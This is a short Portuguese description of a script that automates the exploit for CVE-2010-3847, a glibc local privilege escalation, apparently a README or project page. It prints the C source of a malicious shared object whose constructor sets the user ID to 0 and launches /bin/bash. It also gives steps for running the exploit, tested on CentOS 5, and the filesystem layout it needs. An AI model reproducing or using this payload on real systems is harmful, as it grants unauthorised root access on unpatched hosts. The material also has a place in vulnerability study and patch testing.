
Script para explorar o CVE-2010-3847
Feito para automatizar o exploit discutido em [http://marc.info/?l=full-disclosure&m=128776663124692&w=2]. Testado no CentOS 5 x86.
O DSO que ele gera é compilado a partir do seguinte código:
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
Baixe-o, coloque-o em algum lugar executável e execute-o.
/tmp e onde quer que ping esteja devem estar no mesmo sistema de arquivos. Caso contrário, ajuste os caminhos de acordo.